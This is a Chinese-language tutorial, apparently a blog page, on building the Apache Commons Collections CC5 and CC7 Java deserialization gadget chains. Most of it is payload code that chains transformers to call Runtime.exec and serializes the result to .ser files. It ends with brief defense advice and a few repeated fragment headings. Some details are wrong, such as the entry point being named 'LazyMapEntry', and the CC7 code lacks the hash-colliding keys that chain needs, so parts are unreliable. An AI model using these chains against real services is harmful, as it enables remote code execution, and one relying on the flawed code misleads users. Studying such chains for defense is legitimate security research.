Java反序列化漏洞：CC5与CC7链构造详解<\/h1>

1. 概述<\/h2>
本文详细解析Apache Commons Collections反序列化漏洞中的CC5和CC7链构造过程，从发现者角度深入剖析其技术原理和实现细节。<\/p>

2. CC5链构造<\/h2>

2.1 核心组件<\/h3>
CC5链与LazyMap的CC1链非常相似，主要区别在于入口点改为LazyMapEntry<\/code>：<\/p>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.keyvalue.TiedMapEntry;<\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span><\/code><\/pre>2.2 构造过程<\/h3>

创建Transformer链<\/strong>：<\/li>
<\/ol>
final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>});<\/span>
<\/span><\/span><\/code><\/pre>
创建LazyMap<\/strong>：<\/li>
<\/ol>
final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"xxx"<\/span>);<\/span>
<\/span><\/span>final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>
创建TiedMapEntry<\/strong>：<\/li>
<\/ol>
TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span>"yuji"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
利用BadAttributeValueExpException<\/strong>：<\/li>
<\/ol>
BadAttributeValueExpException badAttributeValueExpException =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射设置val字段
<\/span><\/span><\/span><\/span>Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"javax.management.BadAttributeValueExpException"<\/span>);<\/span>
<\/span><\/span>Field field =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>badAttributeValueExpException,<\/span>tiedMapEntry);<\/span>
<\/span><\/span><\/code><\/pre>
序列化与反序列化<\/strong>：<\/li>
<\/ol>
public<\/span> static<\/span> void<\/span> serializable<\/span>(<\/span>Object o)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    final<\/span> ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"CC5.ser"<\/span>));<\/span>
<\/span><\/span>    objectOutputStream.<\/span>writeObject<\/span>(<\/span>o);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> Object derializable<\/span>()<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    final<\/span> ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"CC5.ser"<\/span>));<\/span>
<\/span><\/span>    return<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 触发流程<\/h3>

反序列化BadAttributeValueExpException<\/code>时，会调用其readObject<\/code>方法<\/li>
readObject<\/code>方法会调用toString<\/code>方法处理val<\/code>字段<\/li>
TiedMapEntry<\/code>的toString<\/code>方法会调用getValue<\/code>方法<\/li>
getValue<\/code>方法会调用LazyMap.get<\/code>方法<\/li>
LazyMap.get<\/code>触发Transformer<\/code>链执行命令<\/li>
<\/ol>
3. CC7链构造<\/h2>
3.1 核心思路<\/h3>
CC7链的入口点变为Hashtable<\/code>，通过以下路径触发：<\/p>

从LazyMap.get<\/code>倒推，找到AbstractMapDecorator.equals<\/code>方法<\/li>
Hashtable<\/code>的equals<\/code>方法会触发reconstitutionPut<\/code><\/li>
readObject<\/code>方法调用reconstitutionPut<\/code>方法<\/li>
<\/ol>
3.2 构造过程<\/h3>

创建两个HashMap和Transformer链<\/strong>：<\/li>
<\/ol>
final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map1 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map1.<\/span>put<\/span>(<\/span>"key1"<\/span>,<\/span> "value1"<\/span>);<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>"key2"<\/span>,<\/span> "value2"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>});<\/span>
<\/span><\/span><\/code><\/pre>
创建两个LazyMap<\/strong>：<\/li>
<\/ol>
final<\/span> Map lazymap1 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map1,<\/span> chainedTransformer);<\/span>
<\/span><\/span>final<\/span> Map lazymap2 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map2,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>
创建Hashtable并放入两个LazyMap<\/strong>：<\/li>
<\/ol>
Hashtable table =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>table.<\/span>put<\/span>(<\/span>lazymap1,<\/span>1<\/span>);<\/span>
<\/span><\/span>table.<\/span>put<\/span>(<\/span>lazymap2,<\/span>1<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
序列化与反序列化<\/strong>：<\/li>
<\/ol>
public<\/span> static<\/span> void<\/span> serializable<\/span>(<\/span>Object o)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    final<\/span> ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"CC7.ser"<\/span>));<\/span>
<\/span><\/span>    objectOutputStream.<\/span>writeObject<\/span>(<\/span>o);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> Object derializable<\/span>()<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    final<\/span> ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"CC7.ser"<\/span>));<\/span>
<\/span><\/span>    return<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 触发流程<\/h3>

反序列化Hashtable<\/code>时，会调用其readObject<\/code>方法<\/li>
readObject<\/code>方法调用reconstitutionPut<\/code>方法<\/li>
reconstitutionPut<\/code>方法会调用key.equals<\/code>方法<\/li>
equals<\/code>方法最终触发LazyMap.get<\/code>方法<\/li>
LazyMap.get<\/code>触发Transformer<\/code>链执行命令<\/li>
<\/ol>
4. CC链构造总结<\/h2>
4.1 主要Sink点<\/h3>

invokeTransformer.transform<\/strong>：基于反射原理实现命令执行<\/li>
defineClass → newInstance<\/strong>：通过Java类动态加载机制，加载恶意class文件实现命令执行<\/li>
<\/ol>
4.2 关键特点<\/h3>

CC1-CC7链的gadget链中很多组件是重复使用的<\/li>
理解CC1链和CC3链这两个具有不同sink的链是基础<\/li>
其他链主要是在这两个基础上调整source方式<\/li>
<\/ol>
4.3 学习建议<\/h3>

重点掌握CC1链和CC3链的核心原理<\/li>
理解各个组件的功能及其在链中的作用<\/li>
掌握反射和动态类加载的基本原理<\/li>
通过调试跟踪完整的调用链<\/li>
<\/ol>
5. 防御建议<\/h2>

升级Apache Commons Collections到安全版本<\/li>
使用Java反序列化过滤器<\/li>
避免反序列化不可信数据<\/li>
使用白名单机制控制可反序列化的类<\/li>
<\/ol>
通过深入理解这些链的构造原理，可以更好地防御此类漏洞，也能在安全研究中发现新的利用链。<\/p>
Java反序列化漏洞：CC5与CC7链构造详解<\/h1>

1. 概述<\/h2> 本文详细解析Apache Commons Collections反序列化漏洞中的CC5和CC7链构造过程，从发现者角度深入剖析其技术原理和实现细节。<\/p>

2. CC5链构造<\/h2>

3. CC7链构造<\/h2>

4. CC链构造总结<\/h2>

1. 概述<\/h2>
本文详细解析Apache Commons Collections反序列化漏洞中的CC5和CC7链构造过程，从发现者角度深入剖析其技术原理和实现细节。<\/p>
